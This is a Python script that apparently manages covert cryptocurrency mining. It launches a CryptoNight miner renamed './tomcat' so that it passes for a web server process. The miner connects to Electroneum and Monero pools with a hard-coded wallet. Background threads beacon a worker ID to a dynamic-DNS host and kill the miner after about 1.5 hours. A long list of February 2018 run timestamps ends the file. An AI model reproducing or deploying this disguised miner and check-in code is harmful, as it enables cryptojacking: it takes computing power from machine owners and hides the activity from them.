import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:07.451942
#2018-02-17 16:36:05.247151
#2018-02-17 18:24:01.288790
#2018-02-17 20:12:06.078376
#2018-02-17 21:58:05.925238
#2018-02-17 23:43:01.371821
#2018-02-18 01:33:07.357737
#2018-02-18 03:19:03.613868
#2018-02-18 05:08:01.408928
#2018-02-18 06:59:07.252192
#2018-02-18 08:47:02.200607
#2018-02-18 10:34:05.198217
#2018-02-18 12:19:06.337279
#2018-02-18 14:06:05.848828
#2018-02-18 15:56:03.506994
#2018-02-18 17:46:07.169757
#2018-02-18 19:34:05.446241
#2018-02-18 21:19:03.385159
#2018-02-18 23:07:05.330663
#2018-02-19 00:54:03.737134
#2018-02-19 02:41:04.060520
#2018-02-19 04:27:07.582178
#2018-02-19 06:12:05.702236
#2018-02-19 08:01:01.846663
#2018-02-19 09:51:06.583390
#2018-02-19 11:40:01.372435
#2018-02-19 13:28:01.402634
#2018-02-19 15:18:09.462525
#2018-02-19 17:07:06.525527
#2018-02-19 18:52:08.317131
#2018-02-19 20:42:01.383530
#2018-02-19 22:28:07.139223
#2018-02-20 00:14:07.370396
#2018-02-20 02:01:05.149988
#2018-02-20 03:51:01.998771
#2018-02-20 05:35:08.111311
#2018-02-20 07:19:05.228648
#2018-02-20 09:06:01.421521
#2018-02-20 10:49:05.083767
#2018-02-20 12:35:10.106615
#2018-02-20 14:22:03.654684
#2018-02-20 16:06:04.360480
#2018-02-20 17:52:04.948053
#2018-02-20 19:42:06.404745
#2018-02-20 21:28:05.722202
#2018-02-20 23:13:04.706373
#2018-02-21 00:57:04.590578
#2018-02-21 02:45:07.864668
#2018-02-21 04:34:01.882197
#2018-02-21 06:21:04.806801
#2018-02-21 08:06:09.104263
#2018-02-21 09:52:07.167594
#2018-02-21 11:41:04.798160
#2018-02-21 13:31:01.240506
#2018-02-21 15:16:06.686769
#2018-02-21 17:06:06.310803
#2018-02-21 18:52:07.171386
#2018-02-21 20:40:10.571507
#2018-02-21 22:26:06.543421
#2018-02-22 00:16:01.820225
#2018-02-22 02:03:02.116085
#2018-02-22 03:48:04.497679
#2018-02-22 05:35:01.290262
#2018-02-22 07:20:03.062915
#2018-02-22 09:07:06.827659
#2018-02-22 10:55:06.704086
#2018-02-22 12:42:01.382454
#2018-02-22 14:27:02.024467
#2018-02-22 16:13:05.613912
#2018-02-22 17:58:05.180919
#2018-02-22 19:46:07.729029
#2018-02-22 21:36:05.031854
#2018-02-22 23:23:05.579420
#2018-02-23 01:12:02.122333
#2018-02-23 02:58:01.413843
#2018-02-23 04:44:05.673965
#2018-02-23 06:30:07.330207
#2018-02-23 08:17:05.123643
#2018-02-23 10:34:05.979687
#2018-02-23 12:28:06.916379
#2018-02-23 14:16:07.486239
#2018-02-23 16:08:04.655739
#2018-02-23 17:54:07.013975
#2018-02-23 19:41:06.837237
#2018-02-23 21:25:04.246658
#2018-02-23 23:13:02.044017
#2018-02-24 01:02:04.675942
#2018-02-24 02:54:01.375430
#2018-02-24 04:42:06.215961
#2018-02-24 06:26:06.242811
#2018-02-24 08:14:06.191641
#2018-02-24 09:58:05.803534
#2018-02-24 11:53:05.699523
#2018-02-24 13:44:01.889778
#2018-02-24 15:32:04.748148
#2018-02-24 17:24:06.532264
#2018-02-24 19:12:01.581037
#2018-02-24 21:00:06.726281
#2018-02-25 01:21:07.883005
#2018-02-25 05:29:07.693269
#2018-02-25 11:35:07.059910